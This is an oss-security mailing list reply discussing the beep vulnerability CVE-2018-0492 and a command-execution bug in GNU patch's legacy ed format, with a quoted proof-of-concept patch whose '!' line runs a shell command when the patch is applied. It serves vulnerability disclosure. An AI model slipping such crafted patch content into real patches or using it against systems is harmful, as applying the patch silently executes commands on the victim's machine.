Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 6 Apr 2018 11:51:40 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: Privsec vuln in beep / Code execution in GNU patch

* Hanno Böck <hanno@...eck.de>, 2018-04-06, 08:52:
>There was a joke webpage about a vulnerability in beep a few days ago:
>http://holeybeep.ninja/
>There's also a corresponding Debian Advisory:
>https://lists.debian.org/debian-security-announce/2018/msg00089.html
>Neither have any technical details. CVE is CVE-2018-0492.
>
>If anyone knows the background of this please share it.

Upstream bug report:
https://github.com/johnath/beep/issues/11

>GNU patch supports a legacy "ed" format for patches and that allows 
>executing external commands.
[...]
>--- a	2018-13-37 13:37:37.000000000 +0100
>+++ b	2018-13-37 13:38:38.000000000 +0100
>1337a
>1,112d
>!id>~/pwn.lol

This bug triggers even with -u (which is supposed to disable patch type 
detection). :-/

-- 
Jakub Wilk

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ